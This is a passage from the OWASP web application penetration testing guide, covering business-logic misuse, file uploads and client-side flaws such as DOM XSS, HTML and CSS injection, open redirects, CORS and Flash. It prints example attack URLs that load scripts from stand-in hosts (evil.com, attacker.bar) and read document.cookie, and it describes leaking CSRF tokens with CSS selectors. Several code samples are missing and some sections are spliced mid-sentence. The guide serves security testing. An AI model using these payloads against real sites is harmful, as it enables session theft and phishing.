are very application/system specific and careful manual misuse cases must be developed using requirements and use cases. The applications business process must have checks to ensure that the user’s transactions/actions are proceeding in the correct/acceptable order and if a transaction triggers some sort of action, that action will be “rolled back” and removed if the transaction is not successfully completed. Examples Example 1 Many of us receive so type of “club/loyalty points” for purchases from grocery stores and gas stations. Suppose a user was able to start a transaction linked to their account and then after points have been added to their club/loyalty account cancel out of the transaction or remove items from their “basket” and tender. In this case the system either should not apply points/ credits to the account until it is tendered or points/credits should be “rolled back” if the point/credit increment does not match the final tender. With this in mind, an attacker may start transactions and cancel them to build their point levels without actually buy anything. Example 2 An electronic bulletin board system may be designed to ensure that initial posts do not contain profanity based on a list that the post is compared against. If a word on a “black” the list is found in the user entered text the submission is not posted. But, once a submission is posted the submitter can access, edit, and change the submission contents to include words included on the profanity/black list since on edit the posting is never compared again. Keeping this in mind, attackers may open an initial blank or minimal discussion then add in whatever they like as an update. How to Test Generic Testing Method • Review the project documentation and use exploratory testing looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow. • For each method develop a misuse case and try to circumvent or perform an action that is “not acceptable” per the the business logic workflow. Testing Method 1 • Start a transaction going through the application past the points that triggers credits/points to the users account. • Cancel out of the transaction or reduce the final tender so that the point values should be decreased and check the points/ 185 Web Application Penetration Testing credit system to ensure that the proper points/credits were recorded. Testing Method 2 • On a content management or bulletin board system enter and save valid initial text or values. • Then try to append, edit and remove data that would leave the existing data in an invalid state or with invalid values to ensure that the user is not allowed to save the incorrect information. Some “invalid” data or information may be specific words (profanity) or specific topics (such as political issues). Related Test Cases • Testing Directory traversal/file include (OTG-AUTHZ-001) • Testing for bypassing authorization schema (OTG-AUTHZ-002) • Testing for Bypassing Session Management Schema (OTGSESS-001) • Test Business Logic Data Validation (OTG-BUSLOGIC-001) • Test Ability to Forge Requests (OTG-BUSLOGIC-002) • Test Integrity Checks (OTG-BUSLOGIC-003) • Test for Process Timing (OTG-BUSLOGIC-004) • Test Number of Times a Function Can be Used Limits (OTG-BUSLOGIC-005) • Test Defenses Against Application Mis-use (OTG-BUSLOGIC-007) • Test Upload of Unexpected File Types (OTG-BUSLOGIC-008) • Test Upload of Malicious Files (OTG-BUSLOGIC-009) References • OWASP Detail Misuse Cases - https://www.owasp.org/index php/Detail_misuse_cases • Real-Life Example of a ‘Business Logic Defect - http://h30501 www3.hp.com/t5/Following-the-White-Rabbit-A/Real-LifeExample-of-a-Business-Logic-Defect-Screen-Shots/bap/22581 • Top 10 Business Logic Attack Vectors Attacking and Exploiting Business Application Assets and Flaws – Vulnerability Detection to Fix - http://www.ntobjectives.com/go/business-logicattack-vectors-white-paper/ and http://www.ntobjectives. com/files/Business_Logic_White_Paper.pdf • CWE-840: Business Logic Errors - http://cwe.mitre.org/data definitions/840.html Remediation The application must be self-aware and have checks in place ensuring that the users complete each step in the work flow pro- cess in the correct order and prevent attackers from circumventing/skipping/or repeating any steps/processes in the workflow. Test for workflow vulnerabilities involves developing business logic abuse/misuse cases with the goal of successfully completing the business process while not completing the correct steps in the correct order. Test defenses against application mis-use (OTG-BUSLOGIC-007) Summary The misuse and invalid use of of valid functionality can identify attacks attempting to enumerate the web application, identify weaknesses, and exploit vulnerabilities. Tests should be undertaken to determine whether there are application-layer defensive mechanisms in place to protect the application. The lack of active defenses allows an attacker to hunt for vulnerabilities without any recourse. The application’s owner will thus not know their application is under attack. Example An authenticated user undertakes the following (unlikely) sequence of actions: [1] Attempt to access a file ID their roles is not permitted to download [2] Substitutes a single tick (‘) instead of the file ID number [3] Alters a GET request to a POST [4] Adds an extra parameter [5] Duplicates a parameter name/value pair The application is monitoring for misuse and responds after the 5th event with extremely high confidence the user is an attacker. For example the application: • Disables critical functionality • Enables additional authentication steps to the remaining functionality • Adds time-delays into every request-response cycle • Begins to record additional data about the user’s interactions (e.g. sanitized HTTP request headers, bodies and response bodies) If the application does not respond in any way and the attacker can continue to abuse functionality and submit clearly malicious content at the application, the application has failed this test case. In practice the discrete example actions in the example above are unlikely to occur like that. It is much more probable that a fuzzing tool is used to identify weaknesses in each parameter in turn. This is what a security tester will have undertaken too. How to Test This test is unusual in that the result can be drawn from all the other tests performed against the web application. While performing all the other tests, take note of measures that might indicate the application has in-built self-defense: • Changed responses • Blocked requests • Actions that log a user out or lock their account 186 Web Application Penetration Testing These may only be localised. Common localized (per function) defenses are: • Rejecting input containing certain characters • Locking out an account temporarily after a number of authentication failures Localized security controls are not sufficient. There are often no defenses against general mis-use such as: • Forced browsing • Bypassing presentation layer input validation • Multiple access control errors • Additional, duplicated or missing parameter names • Multiple input validation or business logic verification failures with values that cannot be the result user mistakes or typos • Structured data (e.g. JSPN, XML) of an invalid format is received • Blatant cross-site scripting or SQL injection payloads are received • Utilising the application faster than would be possible without automation tools • Change in continental geo-location of a user • Change of user agent • Accessing a multi-stage business process in the wrong order • Large number of, or high rate of use of, application-specific functionality (e.g. voucher code submission, failed credit card payments, file uploads, file downloads, log outs, etc). These defenses work best in authenticated parts of the application, although rate of creation of new accounts or accessing content (e.g. to scrape information) can be of use in public areas. Not all the above need to be monitored by the application, but there is a problem if none of them are. By testing the web application, doing the above type of actions, was any response taken against the tester? If not, the tester should report that the application appears to have no application-wide active defenses against misuse. Note it is sometimes possible that all responses to attack detection are silent to the user (e.g. logging changes, increased monitoring, alerts to administrators and and request proxying), so confidence in this finding cannot be guaranteed. In practice, very few applications (or related infrastructure such as a web application firewall) are detecting these types of misuse. Related Test Cases All other test cases are relevant. Tools The tester can use many of the tools used for the other test cases. References • Resilient Software, Software Assurance, US Department Homeland Security • IR 7684 Common Misuse Scoring System (CMSS), NIST • Common Attack Pattern Enumeration and Classification (CAPEC), The Mitre Corporation • OWASP_AppSensor_Project • AppSensor Guide v2, OWASP • Watson C, Coates M, Melton J and Groves G, Creating Attack Aware Software Applications with Real-Time Defenses, CrossTalk The Journal of Defense Software Engineering, Vol. 24, No. 5, Sep/Oct 2011 Test Upload of Unexpected File Types (OTG-BUSLOGIC-008) Summary Many application’s business processes allow for the upload and manipulation of data that is submitted via files. But the business process must check the files and only allow certain “approved” file types. Deciding what files are “approved” is determined by the business logic and is application/system specific. The risk in that by allowing users to upload files, attackers may submit an unexpected file type that that could be executed and adversely impact the application or system through attacks that may deface the web site, perform remote commands, browse the system files, browse the local resources, attack other servers, or exploit the local vulnerabilities, just to name a few. Vulnerabilities related to the upload of unexpected file types is unique in that the upload should quickly reject a file if it does not have a specific extension. Additionally, this is different from uploading malicious files in that in most cases an incorrect file format may not by it self be inherently “malicious” but may be detrimental to the saved data. For example if an application accepts Windows Excel files, if an similar database file is uploaded it may be read but data extracted my be moved to incorrect locations. The application may be expecting only certain file types to be uploaded for processing, such as .CSV, .txt files. The application may not validate the uploaded file by extension (for low assurance file validation) or content (high assurance file validation). This may result in unexpected system or database results within the application/system or give attackers additional methods to exploit the application/system. Example Suppose a picture sharing application allows users to upload a .gif or .jpg graphic file to the web site. What if an attacker is able to upload an html file with a to the affected page URL which would, when executed, display the alert box. In this instance, the appended code would not be sent to the server as everything after the # character is not treated as part of the query by the browser but as a fragment. In this example, the code is immediately executed and an alert of “xss” is displayed by the page. Unlike the more common types of cross 189 Web Application Penetration Testing site scripting (Stored and Reflected) in which the code is sent to the server and then back to the browser, this is executed directly in the user’s browser without server contact. The consequences of DOM-based XSS flaws are as wide ranging as those seen in more well known forms of XSS, including cookie retrieval, further malicious script injection, etc. and should therefore be treated with the same severity. Black Box testing Blackbox testing for DOM-Based XSS is not usually performed since access to the source code is always available as it needs to be sent to the client to be executed. Gray Box testing Testing for DOM-Based XSS vulnerabilities: JavaScript applications differ significantly from other types of applications because they are often dynamically generated by the server, and to understand what code is being executed, the website being tested needs to be crawled to determine all the instances of JavaScript being executed and where user input is accepted. Many websites rely on large libraries of functions, which often stretch into the hundreds of thousands of lines of code and have not been developed in-house. In these cases, top-down testing often becomes the only really viable option, since many bottom level functions are never used, and analyzing them to determine which are sinks will use up more time than is often available. The same can also be said for top-down testing if the inputs or lack thereof is not identified to begin with. User input comes in two main forms: • Input written to the page by the server in a way that does not allow direct XSS • Input obtained from client-side JavaScript objects Here are two examples of how the server may insert data into JavaScript: And here are two examples of input from client-side JavaScript objects: While there is little difference to the JavaScript code in how they are retrieved, it is important to note that when input is received via the server, the server can apply any permutations to the data that it desires, whereas the permutations performed by JavaScript objects are fairly well understood and documented, and so if someFunction in the above example were a sink, then the exploitability of the former would depend on the filtering done by the server, whereas the latter would depend on the encoding done by the browser on the window.referer object. Stefano Di Paulo has written an excellent article on what browsers return when asked for the various elements of a URL using the document. and location. attributes. Additionally, JavaScript is often executed outside of The above code contains a source ‘location.hash’ that is controlled by the attacker that can inject directly in the ‘message’ value a JavaScript Code to take the control of the user browser. References OWASP Resources • DOM based XSS Prevention Cheat Sheet • DOMXSS.com - http://www.domxss.com Whitepapers • Browser location/document URI/URL Sources - https://code google.com/p/domxsswiki/wiki/LocationSources • i.e., what is returned when the user asks the browser for things like document.URL, document.baseURI, location, location.href, etc. Testing for HTML Injection (OTG-CLIENT-003) Summary HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. How to Test This vulnerability occurs when the user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) the legit from the malicious parts and consequently will parse and execute all as legit in the victim context. There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is an high risk of XSS, specifically an HTML injection one. Malicious HTML code could be injected for example via innerHTML, that is used to render user inserted HTML code. If strings are not correctly sanitized the problem could lead to XSS based HTML injection. Another method could be document.write() When trying to exploit this kind of issues, consider that some characters are treated differently by different browsers. For reference see the DOM XSS Wiki. The innerHTML property sets or returns the inner HTML of an element. An improper usage of this property, that means lack of sanitization from untrusted input and missing output encoding, could allow an attacker to inject malicious HTML code. Example of Vulnerable Code: The following example shows a snippet of vulnerable code that allows an unvalidated input to be used to create dynamic html in the page context: var userposition=location.href.indexOf(“user=”); var user=location.href.substring(userposition+5); document.getElementById(“Welcome”).innerHTML=” Hello, “+user; In the same way, the following example shows a vulnerable code using the document.write() function: var userposition=location.href.indexOf(“user=”); var user=location.href.substring(userposition+5); document.write(“Hello, “ + user +”
”); In both examples, an input like the following: http://vulnerable.site/page.html?user= will add to the page the image tag that will execute an arbitrary JavaScript code inserted by the malicious user in the HTML context. Black Box testing 191 Web Application Penetration Testing Black box testing for HTML Injection is not usually performed since access to the source code is always available as it needs to be sent to the client to be executed. Gray Box testing Testing for HTML Injection vulnerabilities: For example, looking at the following URL: http://www.domxss.com/domxss/01_Basics/06_jquery_old_html.html The HTML code will contains the following script: Show HereShowing Message1
Show HereShowing Message2
Show HereShowing Message3
It is possible to inject HTML code.
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS.com - http://www.domxss.com
Whitepapers
• Browser location/document URI/URL Sources - https://code.
google.com/p/domxsswiki/wiki/LocationSources
• i.e., what is returned when the user asks the browser for things
like document.URL, document.baseURI, location, location.href,
etc.
Testing for Client Side URL Redirect
(OTG-CLIENT-004)
Summary
This section describes how to check for Client Side URL Redirection, also known as Open Redirection. It is an input validation flaw
that exists when an application accepts an user controlled input
which specifies a link that leads to an external URL that could be
malicious. This kind of vulnerability could be used to accomplish a
phishing attack or redirect a victim to an infection page.
How to Test
This vulnerability occurs when an application accepts untrusted
input that contains an URL value without sanitizing it. This URL
value could cause the web application to redirect the user to another page as, for example, a malicious page controlled by the
attacker.
By modifying untrusted URL input to a malicious site, an attacker
may successfully launch a phishing scam and steal user credentials. Since the redirection is originated by the real application,
the phishing attempts may have a more trustworthy appearance.
A phishing attack example could be the following:
http://www.target.site?#redirect=www.fake-target.site
The victim that visits target.site will be automatically redirected
to fake-target.site where an attacker could place a fake page to
steal victim’s credentials.
Moreover open redirections could also be used to maliciously
craft an URL that would bypass the application’s access control
checks and then forward the attacker to privileged functions
that they would normally not be able to access.
Black Box testing
Black box testing for Client Side URL Redirect is not usually performed since access to the source code is always available as it
needs to be sent to the client to be executed.
Gray Box testing
Testing for Client Side URL Redirect vulnerabilities:
When testers have to manually check for this type of vulnerability they have to identify if there are client side redirections implemented in the client side code (for example in the JavaScript
code).
These redirections could be implemented, for example in JavaScript, using the “window.location” object that can be used to take
the browser to another page by simply assigning a string to it. (as
you can see in the following snippet of code).
var redir = location.hash.substring(1);
if (redir)
window.location=’http://’+decodeURIComponent(redir);
In the previous example the script does not perform any validation of the variable “redir”, that contains the user supplied input
via the query string, and in the same time does not apply any
form of encoding, then this unvalidated input is passed to the
windows.location object originating a URL redirection vulnerability.
This implies that an attacker could redirect the victim to a malicious site simply by submitting the following query string:
http://www.victim.site/?#www.malicious.site
192
Web Application Penetration Testing
Note how, if the vulnerable code is the following
var redir = location.hash.substring(1);
if (redir)
window.location=decodeURIComponent(redir);
It also could be possible to inject JavaScript code, for example by
submitting the following query string:
http://www.victim.site/?#javascript:alert(document.cookie)
When trying to check for this kind of issues, consider that some
characters are treated differently by different browsers.
Moreover always consider the possibility to try absolute URLs
variants as described here: http://kotowicz.net/absolute/
Tools
• DOMinator - https://dominator.mindedsecurity.com/
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS.com - http://www.domxss.com
Whitepapers
• Browser location/document URI/URL Sources - https://code
google.com/p/domxsswiki/wiki/LocationSources
• i.e., what is returned when you ask the browser for things
like document.URL, document.baseURI, location, location.
href, etc.
• Krzysztof Kotowicz: “Local or Externa? Weird URL formats on
the loose” - http://kotowicz.net/absolute/
Testing for CSS Injection (OTG-CLIENT-005)
Summary
A CSS Injection vulnerability involves the ability to inject arbitrary
CSS code in the context of a trusted web site, and this will be
rendered inside the victim’s browser. The impact of such a vulnerability may vary on the basis of the supplied CSS payload: it
could lead to Cross-Site Scripting in particular circumstances, to
data exfiltration in the sense of extracting sensitive data or to UI
modifications.
How to Test
Such a vulnerability occurs when the application allows to supply
user-generated CSS or it is possible to somehow interfere with
the legit stylesheets. Injecting code in the CSS context gives the
attacker the possibility to execute JavaScript in certain conditions
as well as extracting sensitive values through CSS selectors and
functions able to generate HTTP requests. Actually, giving the
users the possibility to customize their own personal pages by
using custom CSS files results in a considerable risk, and should
be definitely avoided.
The following JavaScript code shows a possible vulnerable
script in which the attacker is able to control the “location.hash”
(source) which reaches the “cssText” function (sink). This particular case may lead to DOMXSS in older browser versions, such as
Opera, Internet Explorer and Firefox; for reference see DOM XSS
Wiki, section “Style Sinks”.
Click me
Specifically the attacker could target the victim by asking her to
visit the following URLs:
• www.victim.com/#red;-o-link:’javascript:alert(1)’;-o-linksource:current; (Opera [8,12])
• www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)
The same vulnerability may appear in the case of classical reflected XSS in which for instance the PHP code looks like the following:
Much more interesting attack scenarios involve the possibility to
extract data through the adoption of pure CSS rules. Such attacks can be conducted through CSS selectors and leading for
instance to grab anti-CSRF tokens, as follows. In particular, input[name=csrf_token][value=^a] represents an element with
the attribute “name” set “csrf_token” and whose attribute “value” starts with “a”. By detecting the length of the attribute “value”, it is possible to carry out a brute force attack against it and
send its value to the attacker’s domain.
Much more modern attacks involving a combination of SVG, CSS
and HTML5 have been proven feasible, therefore we recommend
to see the References section for details.
Black Box testing
We are referring to client-side testing, therefore black box testing is not usually performed since access to the source code is
always available as it needs to be sent to the client to be executed. However, it may happen that the user is given a certain
degree of freedom in terms of possibilities to supply HTML code;
in that case it is required to test whether no CSS injections are
possible: tags like “link” and “style” should be disallowed, as well
193
Web Application Penetration Testing
as attributes “style”.
Gray Box testing
Testing for CSS Injection vulnerabilities:
Manual testing needs to be conducted and the JavaScript code
analyzed in order to understand whether the attackers can inject its own content in CSS context. In particular we should be
interested in how the website returns CSS rules on the basis of
the inputs.
The following is a basic example:
Click me
Hi
The above code contains a source “location.hash” that is controlled by the attacker that can inject directly in the attribute
“style” of an HTML element. As mentioned above, this may lead
to different results on the basis of the adopted browser and the
supplied payload.
It is recommended that testers use the jQuery function css(property, value) in such circumstances as follows, since this would
disallow any damaging injections. In general, we recommend to
use always a whitelist of allowed characters any time the input is
reflected in the CSS context.
Click me
Hi
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki
CssText
Presentations
• DOM Xss Identification and Exploitation, Stefano Di Paola
h t t p : //d o m i n a t o r. g o o g l e c o d e . c o m / f i l e s / D O M X s s _
Identification_and_exploitation.pdf
• Got Your Nose! How To Steal Your Precious Data Without
Using Scripts, Mario Heiderich - http://www.youtube.com/
watch?v=FIQvAaZj_HA
• Bypassing Content-Security-Policy, Alex Kouzemtchenko
http://ruxcon.org.au/assets/slides/CSP-kuza55.pptx
Proof of Concepts
• Password “cracker” via CSS and HTML5 - http://html5sec.org
invalid/?length=25
• CSS attribute reading - http://eaea.sirdarckcat.net/cssar/v2/
Testing for Client Side Resource Manipulation
(OTG-CLIENT-006)
Summary
A ClientSide Resource Manipulation vulnerability is an input validation flaw that occurs when an application accepts an user
controlled input which specifies the path of a resource (for example the source of an iframe, js, applet or the handler of an XMLHttpRequest). Specifically, such a vulnerability consists in the
ability to control the URLs which link to some resources present
in a web page. The impact may vary on the basis of the type of
the element whose URL is controlled by the attacker, and it is
usually adopted to conduct Cross-Site Scripting attacks.
How to Test
Such a vulnerability occurs when the application employs user
controlled URLs for referencing external/internal resources. In
these circumstances it is possible to interfere with the expected
application’s behavior in the sense of making it load and render
malicious objects.
The following JavaScript code shows a possible vulnerable
script in which the attacker is able to control the “location.hash”
(source) which reaches the attribute “src” of a script element.
This particular obviously leads XSS since an external JavaScript
could be easily injected in the trusted web site.
Specifically the attacker could target the victim by asking her to
visit the following URL:
www.victim.com/#http://evil.com/js.js
Where js.js contains:
alert(document.cookie)
Controlling scripts’ sources is a basic example, since some other
interesting and more subtle cases can take place. A widespread
scenario involves the possibility to control the URL called in a
CORS request; since CORS allows the target resource to be accessible by the requesting domain through a header based approach, then the attacker may ask the target page to load malicious content loaded on its own web site.
Refer to the following vulnerable code:
194
Web Application Penetration Testing
The “location.hash” is controlled by the attacker and it is used for
requesting an external resource, which will be reflected through
the construct “innerHTML”. Basically the attacker could ask the
victim to visit the following URL and at the same time he could
craft the payload handler.
Exploit URL: www.victim.com/#http://evil.com/html.html
Gray Box testing
Testing for Client Side Resource Manipulation vulnerabilities:
To manually check for this type of vulnerability we have to identify whether the application employs inputs without correctly
validating them; these are under the control of the user which
could be able to specify the url of some resources. Since there
are many resources that could be included into the application
(for example images, video, object, css, frames etc.), client side
scripts which handle the associated URLs should be investigated
for potential issues.
The following table shows the possible injection points (sink)
that should be checked:
Sink
Frame
iframe
src
Link
a
href
AJAX Request
xhr.open(method, [url], true);
URL
CSS
link
Sink
Image
img
Object
object
src
Script
script
data
src
The most interesting ones are those that allow to an attacker
to include client side code (for example JavaScript) since it could
lead to an XSS vulnerabilities.
When trying to check for this kind of issues, consider that some
characters are treated differently by different browsers. Moreover always consider the possibility to try absolute URLs variants as described here: http://kotowicz.net/absolute/
Tools
• DOMinator - https://dominator.mindedsecurity.com/
References
OWASP Resources
• DOM based XSS Prevention Cheat Sheet
• DOMXSS.com - http://www.domxss.com
• DOMXSS TestCase - http://www.domxss.com/domxss/01
Basics/04_script_src.html
Test Cross Origin Resource Sharing
(OTG-CLIENT-007)
Black Box testing
Black box testing for Client Side Resource Manipulation is not
usually performed since access to the source code is always
available as it needs to be sent to the client to be executed.
Tag/Method
Tag/Method
Whitepapers
• DOM XSS Wiki - https://code.google.com/p/domxsswiki/wiki
LocationSources
• Krzysztof Kotowicz: “Local or External? Weird URL formats on
the loose” - http://kotowicz.net/absolute/
http://evil.com/html.html
---
Resource
Resource
href
Summary
Cross Origin Resource Sharing or CORS is a mechanism that enables a web browser to perform “cross-domain” requests using
the XMLHttpRequest L2 API in a controlled manner. In the past,
the XMLHttpRequest L1 API only allowed requests to be sent
within the same origin as it was restricted by the same origin
policy.
Cross-Origin requests have an Origin header, that identifies the
domain initiating the request and is always sent to the server.
CORS defines the protocol to use between a web browser and a
server to determine whether a cross-origin request is allowed.
In order to accomplish this goal, there are a few HTTP headers
involved in this process, that are supported by all major browsers and we will cover below including: Origin, Access-Control-Request-Method, Access-Control-Request-Headers, Access-Control-Allow-Origin, Access-Control-Allow-Credentials,
Access-Control-Allow-Methods, Access-Control-Allow-Headers.
The CORS specification mandates that for non simple requests,
such as requests other than GET or POST or requests that uses
credentials, a pre-flight OPTIONS request must be sent in advance to check if the type of request will have a bad impact on
the data. The pre-flight request checks the methods, headers
allowed by the server, and if credentials are permitted, based on
the result of the OPTIONS request, the browser decides whether
the request is allowed or not.
195
Web Application Penetration Testing
How to Test
Origin & Access-Control-Allow-Origin
The Origin header is always sent by the browser in a CORS request and indicates the origin of the request. The Origin header can not be changed from JavaScript however relying on this
header for Access Control checks is not a good idea as it may be
spoofed outside the browser, so you still need to check that application-level protocols are used to protect sensitive data.
Access-Control-Allow-Origin is a response header used by a
server to indicate which domains are allowed to read the response. Based on the CORS W3 Specification it is up to the client
to determine and enforce the restriction of whether the client
has access to the response data based on this header.
From a penetration testing perspective you should look for insecure configurations as for example using a ‘*’ wildcard as value of
the Access-Control-Allow-Origin header that means all domains
are allowed. Other insecure example is when the server returns
back the Origin header without any additional checks, what can
lead to access of sensitive data. Note that this configuration is
very insecure, and is not acceptable in general terms, except in
the case of a public API that is intended to be accessible by everyone.
Access-Control-Request-Method & Access-Control-Allow-Method
The Access-Control-Request-Method header is used when a
browser performs a preflight OPTIONS request and let the client
indicate the request method of the final request. On the other
hand, the Access-Control-Allow-Method is a response header
used by the server to describe the methods the clients are allowed to use.
Access-Control-Request-Headers & Access-Control-Allow-Headers
These two headers are used between the browser and the server
to determine which headers can be used to perform a cross-origin request.
Access-Control-Allow-Credentials
This header as part of a preflight request indicates that the final
request can include user credentials.
Input validation
XMLHttpRequest L2 (or XHR L2) introduces the possibility of creating a cross-domain request using the XHR API for backwards
compatibility. This can introduce security vulnerabilities that in
XHR L1 were not present. Interesting points of the code to exploit
would be URLs that are passed to XMLHttpRequest without validation, specially if absolute URLS are allowed because that could
lead to code injection. Likewise, other part of the application that
can be exploited is if the response data is not escaped and we
can control it by providing user-supplied input.
Other headers
There are other headers involved like Access-Control-Max-Age
that determines the time a preflight request can be cached in
the browser, or Access-Control-Expose-Headers that indicates
which headers are safe to expose to the API of a CORS API specification, both are response headers specified in the CORS W3C
document.
Black Box testing
Black box testing for finding issues related to Cross Origin Resource Sharing is not usually performed since access to the
source code is always available as it needs to be sent to the client
to be executed.
Gray Box testing
Check the HTTP headers in order to understand how CORS is
used, in particular we should be very interested in the Origin
header to learn which domains are allowed. Also, manual inspection of the JavaScript is needed to determine whether the code
is vulnerable to code injection due to improper handling of user
supplied input. Below are some examples:
Example 1: Insecure response with wildcard ‘*’ in Access-Control-Allow-Origin:
Request (note the ‘Origin’ header:)
GET http://attacker.bar/test.php HTTP/1.1
Host: attacker.bar
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/CORSexample1.html
Origin: http://example.foo
Connection: keep-alive
Response (note the ‘Access-Control-Allow-Origin’ header:)
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:57:53 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Content-Length: 4
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: application/xml
[Response Body]
Example 2: Input validation issue, XSS with CORS:
This code makes a request to the resource passed after the #
character in the URL, initially used to get resources in the same
server.
Vulnerable code:
For example, a request like this will show the contents of the
profile.php file:
http://example.foo/main.php#profile.php
Request and response generated by this URL:
GET http://example.foo/profile.php HTTP/1.1
Host: example.foo
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/main.php
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 18:20:48 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze17
Vary: Accept-Encoding
Content-Length: 25
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html
[Response Body]
Now, as there is no URL validation we can inject a remote script,
that will be injected and executed in the context of the example.
foo domain, with a URL like this:
http://example.foo/main.php#http://attacker.bar/file.php
Request and response generated by this URL:
GET http://attacker.bar/file.php HTTP/1.1
Host: attacker.bar
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;
rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://example.foo/main.php
Origin: http://example.foo
Connection: keep-alive
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2013 19:00:32 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u3
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
Content-Length: 92
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Injected Content from attacker.bar
Tools
• OWASP Zed Attack Proxy (ZAP) - https://www.owasp.org
index.php/OWASP_Zed_Attack_Proxy_Project
ZAP is an easy to use integrated penetration testing tool for
finding vulnerabilities in web applications. It is designed to be
used by people with a wide range of security experience and as
such is ideal for developers and functional testers who are new
to penetration testing. ZAP provides automated scanners as
well as a set of tools that allow you to find security vulnerabilities manually.
References
OWASP Resources
• OWASP HTML5 Security Cheat Sheet: https://www.owasp
org/index.php/HTML5_Security_Cheat_Sheet
Whitepapers
• W3C - CORS W3C Specification: http://www.w3.org/TR/cors/
197
Web Application Penetration Testing
Testing for Cross site flashing
(OTG-CLIENT-008)
Summary
ActionScript is the language, based on ECMAScript, used by Flash
applications when dealing with interactive needs. There are three
versions of the ActionScript language. ActionScript 1.0 and ActionScript 2.0 are very similar with ActionScript 2.0 being an extension of
ActionScript 1.0. ActionScript 3.0, introduced with Flash Player 9, is a
rewrite of the language to support object orientated design.
ActionScript, like every other language, has some implementation
patterns which could lead to security issues. In particular, since Flash
applications are often embedded in browsers, vulnerabilities like
DOM based Cross-Site Scripting (XSS) could be present in flawed
Flash applications.
How to Test
Since the first publication of “Testing Flash Applications” [1], new
versions of Flash player were released in order to mitigate some of
the attacks which will be described. Nevertheless, some issues still
remain exploitable because they are the result of insecure programming practices.
Decompilation
Since SWF files are interpreted by a virtual machine embedded in the
player itself, they can be potentially decompiled and analysed. The
most known and free ActionScript 2.0 decompiler is flare.
To decompile a SWF file with flare just type:
$ flare hello.swf
it will result in a new file called hello.flr.
Decompilation helps testers because it allows for source code assisted, or white-box, testing of the Flash applications. HP’s free
SWFScan tool can decompile both ActionScript 2.0 and ActionScript
3.0 SWFScan
The OWASP Flash Security Project maintains a list of current disassemblers, decompilers and other Adobe Flash related testing tools.
Undefined Variables FlashVars
FlashVars are the variables that the SWF developer planned on receiving from the web page. FlashVars are typically passed in from
the Object or Embed tag within the HTML. For instance:
FlashVars can also be initialized from the URL:
http://www.example.org/somefilename.swf?var1=val1&var2=val2
In ActionScript 3.0, a developer must explicitly assign the FlashVar
values to local variables. Typically, this looks like:
var paramObj:Object = LoaderInfo(this.root.loaderInfo).
parameters;
var var1:String = String(paramObj[“var1”]);
var var2:String = String(paramObj[“var2”]);
In ActionScript 2.0, any uninitialized global variable is assumed to be
a FlashVar. Global variables are those variables that are prepended
by _root, _global or _level0. This means that if an attribute like:
_root.varname
is undefined throughout the code flow, it could be overwritten by
setting
http://victim/file.swf?varname=value
Regardless of whether you are looking at ActionScript 2.0 or ActionScript 3.0, FlashVars can be a vector of attack. Let’s look at some ActionScript 2.0 code that is vulnerable:
Example:
movieClip 328 __Packages.Locale {
#initclip
if (!_global.Locale) {
var v1 = function (on_load) {
var v5 = new XML();
var v6 = this;
v5.onLoad = function (success) {
if (success) {
trace(‘Locale loaded xml’);
var v3 = this.xliff.file.body.$trans_unit;
var v2 = 0;
while (v2 < v3.length) {
Locale.strings[v3[v2]._resname] = v3[v2].source.__
text;
++v2;
}
on_load();
} else {}
};
if (_root.language != undefined) {
Locale.DEFAULT_LANG = _root.language;
}
198
Web Application Penetration Testing
v5.load(Locale.DEFAULT_LANG + ‘/player_’ +
Locale.DEFAULT_LANG + ‘.xml’);
};
The above code could be attacked by requesting:
http://victim/file.swf?language=http://evil.example.org/malicious.xml?
Unsafe Methods
When an entry point is identified, the data it represents could be
used by unsafe methods. If the data is not filtered/validated using
the right regexp it could lead to some security issue.
Unsafe Methods since version r47 are:
loadVariables()
loadMovie()
getURL()
loadMovie()
loadMovieNum()
FScrollPane.loadScrollContent()
LoadVars.load
LoadVars.send
XML.load ( ‘url’ )
LoadVars.load ( ‘url’ )
Sound.loadSound( ‘url’ , isStreaming );
NetStream.play( ‘url’ );
flash.external.ExternalInterface.call(_root.callback)
htmlText
The Test
In order to exploit a vulnerability, the swf file should be hosted on
the victim’s host, and the techniques of reflected XSS must be used.
That is forcing the browser to load a pure swf file directly in the location bar (by redirection or social engineering) or by loading it through
an iframe from an evil page:
This is because in this situation the browser will self-generate an
HTML page as if it were hosted by the victim host.
XSS
GetURL (AS2) / NavigateToURL (AS3):
